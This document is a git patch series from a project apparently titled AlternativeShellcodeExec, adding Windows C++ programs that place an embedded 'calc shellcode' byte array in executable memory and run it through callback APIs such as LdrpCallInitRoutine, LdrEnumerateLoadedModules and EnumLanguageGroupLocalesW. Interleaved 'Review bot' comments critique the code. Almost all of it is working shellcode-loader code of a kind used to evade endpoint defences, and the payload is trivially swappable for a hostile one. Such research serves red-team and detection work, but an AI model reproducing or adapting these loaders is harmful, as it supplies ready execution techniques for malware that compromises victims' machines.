From: alfarom256 Date: Tue, 30 Mar 2021 13:58:17 -0400 Subject: [PATCH 07/28] Added LdrpCallInitRoutine --- AlternativeShellcodeExec.sln | 10 ++ .../LdrpCallInitRoutine.vcxproj | 147 ++++++++++++++++++ .../LdrpCallInitRoutine.vcxproj.filters | 22 +++ LdrpCallInitRoutine/Source.cpp | 48 ++++++ 4 files changed, 227 insertions(+) create mode 100644 LdrpCallInitRoutine/LdrpCallInitRoutine.vcxproj create mode 100644 LdrpCallInitRoutine/LdrpCallInitRoutine.vcxproj.filters create mode 100644 LdrpCallInitRoutine/Source.cpp diff --git a/AlternativeShellcodeExec.sln b/AlternativeShellcodeExec.sln index 31f9a07..c1d8717 100644 --- a/AlternativeShellcodeExec.sln +++ b/AlternativeShellcodeExec.sln @@ -53,6 +53,8 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "FiberContextEdit", "FiberCo EndProject Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "FlsAlloc", "FlsAlloc\FlsAlloc.vcxproj", "{784E8C7B-CCB3-40CF-8FEF-7D01A563CEE5}" EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "LdrpCallInitRoutine", "LdrpCallInitRoutine\LdrpCallInitRoutine.vcxproj", "{6C619AA0-A97B-441D-8A7C-EE86BFEB7D62}" +EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|x64 = Debug|x64 
@@ -261,6 +263,14 @@ Global {784E8C7B-CCB3-40CF-8FEF-7D01A563CEE5}.Release|x64.Build.0 = Release|x64 {784E8C7B-CCB3-40CF-8FEF-7D01A563CEE5}.Release|x86.ActiveCfg = Release|Win32 {784E8C7B-CCB3-40CF-8FEF-7D01A563CEE5}.Release|x86.Build.0 = Release|Win32 + {6C619AA0-A97B-441D-8A7C-EE86BFEB7D62}.Debug|x64.ActiveCfg = Debug|x64 + {6C619AA0-A97B-441D-8A7C-EE86BFEB7D62}.Debug|x64.Build.0 = Debug|x64 + {6C619AA0-A97B-441D-8A7C-EE86BFEB7D62}.Debug|x86.ActiveCfg = Debug|Win32 + {6C619AA0-A97B-441D-8A7C-EE86BFEB7D62}.Debug|x86.Build.0 = Debug|Win32 + {6C619AA0-A97B-441D-8A7C-EE86BFEB7D62}.Release|x64.ActiveCfg = Release|x64 + {6C619AA0-A97B-441D-8A7C-EE86BFEB7D62}.Release|x64.Build.0 = Release|x64 + {6C619AA0-A97B-441D-8A7C-EE86BFEB7D62}.Release|x86.ActiveCfg = Release|Win32 + {6C619AA0-A97B-441D-8A7C-EE86BFEB7D62}.Release|x86.Build.0 = Release|Win32 EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE diff --git a/LdrpCallInitRoutine/LdrpCallInitRoutine.vcxproj b/LdrpCallInitRoutine/LdrpCallInitRoutine.vcxproj new file mode 100644 index 0000000..dbb0e37 --- /dev/null +++ b/LdrpCallInitRoutine/LdrpCallInitRoutine.vcxproj 
@@ -0,0 +1,147 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {6c619aa0-a97b-441d-8a7c-ee86bfeb7d62} + LdrpCallInitRoutine + 10.0 + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + false + + + true + + + false + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file diff --git a/LdrpCallInitRoutine/LdrpCallInitRoutine.vcxproj.filters b/LdrpCallInitRoutine/LdrpCallInitRoutine.vcxproj.filters new file mode 100644 index 0000000..3e7e62e --- /dev/null +++ b/LdrpCallInitRoutine/LdrpCallInitRoutine.vcxproj.filters @@ -0,0 +1,22 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + \ No newline at end of file diff --git a/LdrpCallInitRoutine/Source.cpp b/LdrpCallInitRoutine/Source.cpp new file mode 100644 index 0000000..e80f0e4 --- /dev/null +++ b/LdrpCallInitRoutine/Source.cpp 
@@ -0,0 +1,48 @@ +#include +#include + +// alfarom256 calc shellcode +unsigned char op[] = +"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" +"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" +"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" +"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" +"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" +"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" +"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" +"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" +"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" +"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" +"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" +"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" +"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" +"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" +"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" +"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" +"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" +"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" +"\x63\x2e\x65\x78\x65\x00"; + + +typedef size_t(__fastcall* lpCallInitRoutine)(size_t, size_t, size_t); +typedef char(__fastcall* pLdrpCallInitRoutine)(lpCallInitRoutine, size_t, unsigned int, size_t); + +#define NTDLL_LDRPCALLINITRT_OFFSET 0x000199bc +// ? ntdll!LdrpCallInitRoutine - ntdll + +int main() { + HANDLE hProcess = ::GetCurrentProcess(); + + LPVOID address = ::VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); + if (!address) { return -1; } + memcpy(address, &op[0], sizeof(op)); + + uintptr_t hNtdll = (uintptr_t)GetModuleHandleA("ntdll"); + if (!hNtdll) { return -1; } + + // todo: find a better way to get LdrpCallInitRoutine. I'm lazy right now. 
+ uintptr_t func = hNtdll + NTDLL_LDRPCALLINITRT_OFFSET; + pLdrpCallInitRoutine LdrpCallInitRoutine = (pLdrpCallInitRoutine)func; + LdrpCallInitRoutine((lpCallInitRoutine)address, 0, 0, 0); + +} \ No newline at end of file From f82372e2d1d4497937c1b1e6b0f148299f30ebda Mon Sep 17 00:00:00 2001 From: S4R1N Date: Tue, 30 Mar 2021 16:00:45 -0400 Subject: [PATCH 08/28] Added LdrEnumerateLoadedModules ftw --- AlternativeShellcodeExec.sln | 10 ++ .../LdrEnumerateLoadedModules.cpp | 98 ++++++++++++ .../LdrEnumerateLoadedModules.vcxproj | 147 ++++++++++++++++++ .../LdrEnumerateLoadedModules.vcxproj.filters | 22 +++ 4 files changed, 277 insertions(+) create mode 100644 LdrEnumerateLoadedModules/LdrEnumerateLoadedModules.cpp create mode 100644 LdrEnumerateLoadedModules/LdrEnumerateLoadedModules.vcxproj create mode 100644 LdrEnumerateLoadedModules/LdrEnumerateLoadedModules.vcxproj.filters diff --git a/AlternativeShellcodeExec.sln b/AlternativeShellcodeExec.sln index 142bd97..755c23c 100644 --- a/AlternativeShellcodeExec.sln +++ b/AlternativeShellcodeExec.sln @@ -55,6 +55,8 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "FlsAlloc", "FlsAlloc\FlsAll EndProject Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumPropsW", "EnumPropsW\EnumPropsW.vcxproj", "{2253DC4A-3941-4809-A20D-416CA71F799A}" EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "LdrEnumerateLoadedModules", "LdrEnumerateLoadedModules\LdrEnumerateLoadedModules.vcxproj", "{C88F3C63-7AE2-49F3-A96F-AC11E44DAD3F}" +EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|x64 = Debug|x64 
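Review bot: `hProcess` in main() is assigned from `::GetCurrentProcess()` and never used; patch 09 in this series removes the identical line from LdrEnumerateLoadedModules.cpp but leaves this one in place. `NTDLL_LDRPCALLINITRT_OFFSET` is a hard-coded image offset, as the `todo` comment acknowledges, so the comment should at least record the ntdll file version the `? ntdll!LdrpCallInitRoutine - ntdll` expression was evaluated against, e.g. `// offset taken from ntdll.dll <version placeholder>; differs per build`. main() also falls off the end without a `return`, unlike its `return -1;` error paths; an explicit `return 0;` makes the exit status intentional.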
@@ -271,6 +273,14 @@ Global {2253DC4A-3941-4809-A20D-416CA71F799A}.Release|x64.Build.0 = Release|x64 {2253DC4A-3941-4809-A20D-416CA71F799A}.Release|x86.ActiveCfg = Release|Win32 {2253DC4A-3941-4809-A20D-416CA71F799A}.Release|x86.Build.0 = Release|Win32 + {C88F3C63-7AE2-49F3-A96F-AC11E44DAD3F}.Debug|x64.ActiveCfg = Debug|x64 + {C88F3C63-7AE2-49F3-A96F-AC11E44DAD3F}.Debug|x64.Build.0 = Debug|x64 + {C88F3C63-7AE2-49F3-A96F-AC11E44DAD3F}.Debug|x86.ActiveCfg = Debug|Win32 + {C88F3C63-7AE2-49F3-A96F-AC11E44DAD3F}.Debug|x86.Build.0 = Debug|Win32 + {C88F3C63-7AE2-49F3-A96F-AC11E44DAD3F}.Release|x64.ActiveCfg = Release|x64 + {C88F3C63-7AE2-49F3-A96F-AC11E44DAD3F}.Release|x64.Build.0 = Release|x64 + {C88F3C63-7AE2-49F3-A96F-AC11E44DAD3F}.Release|x86.ActiveCfg = Release|Win32 + {C88F3C63-7AE2-49F3-A96F-AC11E44DAD3F}.Release|x86.Build.0 = Release|Win32 EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE diff --git a/LdrEnumerateLoadedModules/LdrEnumerateLoadedModules.cpp b/LdrEnumerateLoadedModules/LdrEnumerateLoadedModules.cpp new file mode 100644 index 0000000..bacf580 --- /dev/null +++ b/LdrEnumerateLoadedModules/LdrEnumerateLoadedModules.cpp 
@@ -0,0 +1,98 @@ +#include +#include + +// alfarom256 calc shellcode +unsigned char op[] = +"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" +"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" +"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" +"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" +"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" +"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" +"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" +"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" +"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" +"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" +"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" +"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" +"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" +"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" +"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" +"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" +"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" +"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" +"\x63\x2e\x65\x78\x65\x00"; + +// including ntdef.h was breaking the program so I just simply got the typedef from: +// https://docs.microsoft.com/en-us/windows/win32/api/ntdef/ns-ntdef-_unicode_string + +typedef struct _UNICODE_STRING { + USHORT Length; + USHORT MaximumLength; + PWSTR Buffer; +} UNICODE_STRING, * PUNICODE_STRING; + +// https://doxygen.reactos.org/d1/d97/ldrtypes_8h_source.html + +typedef PVOID PACTIVATION_CONTEXT; + +typedef struct _LDR_DATA_TABLE_ENTRY +{ + LIST_ENTRY InLoadOrderLinks; + LIST_ENTRY InMemoryOrderLinks; + LIST_ENTRY InInitializationOrderLinks; + PVOID DllBase; + PVOID EntryPoint; + ULONG SizeOfImage; + UNICODE_STRING FullDllName; + UNICODE_STRING BaseDllName; + ULONG Flags; + USHORT LoadCount; + USHORT TlsIndex; 
+ union + { + LIST_ENTRY HashLinks; + struct + { + PVOID SectionPointer; + ULONG CheckSum; + }; + }; + union + { + ULONG TimeDateStamp; + PVOID LoadedImports; + }; + PACTIVATION_CONTEXT EntryPointActivationContext; + PVOID PatchInformation; +} LDR_DATA_TABLE_ENTRY, * PLDR_DATA_TABLE_ENTRY; + +typedef VOID(NTAPI LDR_ENUM_CALLBACK)(_In_ PLDR_DATA_TABLE_ENTRY ModuleInformation, _In_ PVOID Parameter, _Out_ BOOLEAN* Stop); +typedef LDR_ENUM_CALLBACK* PLDR_ENUM_CALLBACK; + +// https://doxygen.reactos.org/d7/d55/ldrapi_8c.html#ac623c02eff0b751a63f8573eaca95153 + +typedef NTSTATUS(__stdcall* _LdrEnumerateLoadedModules)( + BOOL ReservedFlag, + LDR_ENUM_CALLBACK EnumProc, + PVOID context + ); + + +int main() { + + HANDLE hProcess = ::GetCurrentProcess(); + + LPVOID address = ::VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); + memcpy(address, &op[0], sizeof(op)); + + HMODULE hNtdll = ::GetModuleHandleW(L"ntdll"); + + if (hNtdll) { + + _LdrEnumerateLoadedModules LdrEnumerateLoadedModules = (_LdrEnumerateLoadedModules)::GetProcAddress(hNtdll, "LdrEnumerateLoadedModules"); + LdrEnumerateLoadedModules(NULL, (PLDR_ENUM_CALLBACK)address, NULL); + + } + +} \ No newline at end of file diff --git a/LdrEnumerateLoadedModules/LdrEnumerateLoadedModules.vcxproj b/LdrEnumerateLoadedModules/LdrEnumerateLoadedModules.vcxproj new file mode 100644 index 0000000..c5f18b7 --- /dev/null +++ b/LdrEnumerateLoadedModules/LdrEnumerateLoadedModules.vcxproj 
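Review bot: The `::GetProcAddress` result in main() is cast and called immediately, `LdrEnumerateLoadedModules(NULL, (PLDR_ENUM_CALLBACK)address, NULL);`, with no NULL check, so a missing export becomes a call through a null function pointer; RtlUserFiberStart/Source.cpp in this series guards the same lookup with `if (!lpRtlUserFiberStart) { return -1; }`. The returned NTSTATUS is also discarded. Style: `_LdrEnumerateLoadedModules` (underscore followed by an uppercase letter) is a reserved identifier in C++; the other files use a `t`/`p` prefix (`tRtlUserFiberStart`, `pLdrpCallInitRoutine`), which would be consistent here. The local `UNICODE_STRING` and `LDR_DATA_TABLE_ENTRY` definitions duplicate SDK types; the `#include` names are not visible on this page, but if winternl.h is ever pulled in these become redefinitions, so the comment above them should say which headers must not be included.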
@@ -0,0 +1,147 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {c88f3c63-7ae2-49f3-a96f-ac11e44dad3f} + LdrEnumerateLoadedModules + 10.0 + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + false + + + true + + + false + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file diff --git a/LdrEnumerateLoadedModules/LdrEnumerateLoadedModules.vcxproj.filters b/LdrEnumerateLoadedModules/LdrEnumerateLoadedModules.vcxproj.filters new file mode 100644 index 0000000..d7e5dd0 --- /dev/null +++ b/LdrEnumerateLoadedModules/LdrEnumerateLoadedModules.vcxproj.filters @@ -0,0 +1,22 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + \ No newline at end of file From af0464c02d7d33de5799486f29c249362ae37d21 Mon Sep 17 00:00:00 2001 From: S4R1N Date: Tue, 30 Mar 2021 16:10:08 -0400 Subject: [PATCH 09/28] removed unnecessary getcurrentprocess op --- LdrEnumerateLoadedModules/LdrEnumerateLoadedModules.cpp | 2 -- 1 file changed, 2 deletions(-) 
diff --git a/LdrEnumerateLoadedModules/LdrEnumerateLoadedModules.cpp b/LdrEnumerateLoadedModules/LdrEnumerateLoadedModules.cpp index bacf580..707f38f 100644 --- a/LdrEnumerateLoadedModules/LdrEnumerateLoadedModules.cpp +++ b/LdrEnumerateLoadedModules/LdrEnumerateLoadedModules.cpp @@ -81,8 +81,6 @@ typedef NTSTATUS(__stdcall* _LdrEnumerateLoadedModules)( int main() { - HANDLE hProcess = ::GetCurrentProcess(); - LPVOID address = ::VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); memcpy(address, &op[0], sizeof(op)); From 4717ffca7c22b4396fd9397b135b84c99cdcff68 Mon Sep 17 00:00:00 2001 From: S4R1N Date: Wed, 31 Mar 2021 13:34:11 -0400 Subject: [PATCH 10/28] Been scavenging the windows API since bug bounty hunters started calling themsleves researchers. --- AlternativeShellcodeExec.sln | 10 ++ .../EnumLanguageGroupLocalesW.cpp | 41 +++++ .../EnumLanguageGroupLocalesW.vcxproj | 147 ++++++++++++++++++ .../EnumLanguageGroupLocalesW.vcxproj.filters | 22 +++ 4 files changed, 220 insertions(+) create mode 100644 EnumLanguageGroupLocalesW/EnumLanguageGroupLocalesW.cpp create mode 100644 EnumLanguageGroupLocalesW/EnumLanguageGroupLocalesW.vcxproj create mode 100644 EnumLanguageGroupLocalesW/EnumLanguageGroupLocalesW.vcxproj.filters diff --git a/AlternativeShellcodeExec.sln b/AlternativeShellcodeExec.sln index 755c23c..df13683 100644 --- a/AlternativeShellcodeExec.sln +++ b/AlternativeShellcodeExec.sln 
@@ -57,6 +57,8 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumPropsW", "EnumPropsW\En EndProject Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "LdrEnumerateLoadedModules", "LdrEnumerateLoadedModules\LdrEnumerateLoadedModules.vcxproj", "{C88F3C63-7AE2-49F3-A96F-AC11E44DAD3F}" EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumLanguageGroupLocalesW", "EnumLanguageGroupLocalesW\EnumLanguageGroupLocalesW.vcxproj", "{8F7C78F7-1CE5-41F8-BAA7-92B297248DB4}" +EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|x64 = Debug|x64 @@ -281,6 +283,14 @@ Global {C88F3C63-7AE2-49F3-A96F-AC11E44DAD3F}.Release|x64.Build.0 = Release|x64 {C88F3C63-7AE2-49F3-A96F-AC11E44DAD3F}.Release|x86.ActiveCfg = Release|Win32 {C88F3C63-7AE2-49F3-A96F-AC11E44DAD3F}.Release|x86.Build.0 = Release|Win32 + {8F7C78F7-1CE5-41F8-BAA7-92B297248DB4}.Debug|x64.ActiveCfg = Debug|x64 + {8F7C78F7-1CE5-41F8-BAA7-92B297248DB4}.Debug|x64.Build.0 = Debug|x64 + {8F7C78F7-1CE5-41F8-BAA7-92B297248DB4}.Debug|x86.ActiveCfg = Debug|Win32 + {8F7C78F7-1CE5-41F8-BAA7-92B297248DB4}.Debug|x86.Build.0 = Debug|Win32 + {8F7C78F7-1CE5-41F8-BAA7-92B297248DB4}.Release|x64.ActiveCfg = Release|x64 + {8F7C78F7-1CE5-41F8-BAA7-92B297248DB4}.Release|x64.Build.0 = Release|x64 + {8F7C78F7-1CE5-41F8-BAA7-92B297248DB4}.Release|x86.ActiveCfg = Release|Win32 + {8F7C78F7-1CE5-41F8-BAA7-92B297248DB4}.Release|x86.Build.0 = Release|Win32 EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE diff --git a/EnumLanguageGroupLocalesW/EnumLanguageGroupLocalesW.cpp b/EnumLanguageGroupLocalesW/EnumLanguageGroupLocalesW.cpp new file mode 100644 index 0000000..31e2bab --- /dev/null +++ b/EnumLanguageGroupLocalesW/EnumLanguageGroupLocalesW.cpp 
@@ -0,0 +1,41 @@ +#include +#include + + +// alfarom256 calc shellcode +unsigned char op[] = +"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" +"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" +"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" +"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" +"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" +"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" +"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" +"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" +"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" +"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" +"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" +"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" +"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" +"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" +"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" +"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" +"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" +"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" +"\x63\x2e\x65\x78\x65\x00"; + + + + +int main() { + + + LPVOID address = ::VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); + memcpy(address, &op[0], sizeof(op)); + + + EnumLanguageGroupLocalesW((LANGGROUPLOCALE_ENUMPROCW)address, LGRPID_ARABIC, 0, 0); + + return 0; + +} \ No newline at end of file diff --git a/EnumLanguageGroupLocalesW/EnumLanguageGroupLocalesW.vcxproj b/EnumLanguageGroupLocalesW/EnumLanguageGroupLocalesW.vcxproj new file mode 100644 index 0000000..f4e1310 --- /dev/null +++ b/EnumLanguageGroupLocalesW/EnumLanguageGroupLocalesW.vcxproj 
@@ -0,0 +1,147 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {8f7c78f7-1ce5-41f8-baa7-92b297248db4} + EnumLanguageGroupLocalesW + 10.0 + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + false + + + true + + + false + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file diff --git a/EnumLanguageGroupLocalesW/EnumLanguageGroupLocalesW.vcxproj.filters b/EnumLanguageGroupLocalesW/EnumLanguageGroupLocalesW.vcxproj.filters new file mode 100644 index 0000000..5dd105b --- /dev/null +++ b/EnumLanguageGroupLocalesW/EnumLanguageGroupLocalesW.vcxproj.filters @@ -0,0 +1,22 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + \ No newline at end of file From 8fabb6f72ac1e980e674ad52e3d87a8a742309c6 Mon Sep 17 00:00:00 2001 
From: S4R1N Date: Thu, 1 Apr 2021 16:55:35 -0400 Subject: [PATCH 11/28] Commit --- AlternativeShellcodeExec.sln | 10 ++ SetTimer/SetTimer.cpp | 47 ++++++++++ SetTimer/SetTimer.vcxproj | 147 ++++++++++++++++++++++++++++++ SetTimer/SetTimer.vcxproj.filters | 22 +++++ 4 files changed, 226 insertions(+) create mode 100644 SetTimer/SetTimer.cpp create mode 100644 SetTimer/SetTimer.vcxproj create mode 100644 SetTimer/SetTimer.vcxproj.filters diff --git a/AlternativeShellcodeExec.sln b/AlternativeShellcodeExec.sln index df13683..c4a9398 100644 --- a/AlternativeShellcodeExec.sln +++ b/AlternativeShellcodeExec.sln @@ -59,6 +59,8 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "LdrEnumerateLoadedModules", EndProject Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumLanguageGroupLocalesW", "EnumLanguageGroupLocalesW\EnumLanguageGroupLocalesW.vcxproj", "{8F7C78F7-1CE5-41F8-BAA7-92B297248DB4}" EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "SetTimer", "SetTimer\SetTimer.vcxproj", "{B014BCB9-7850-4AC7-BD7F-6B07DB77DE35}" +EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|x64 = Debug|x64 
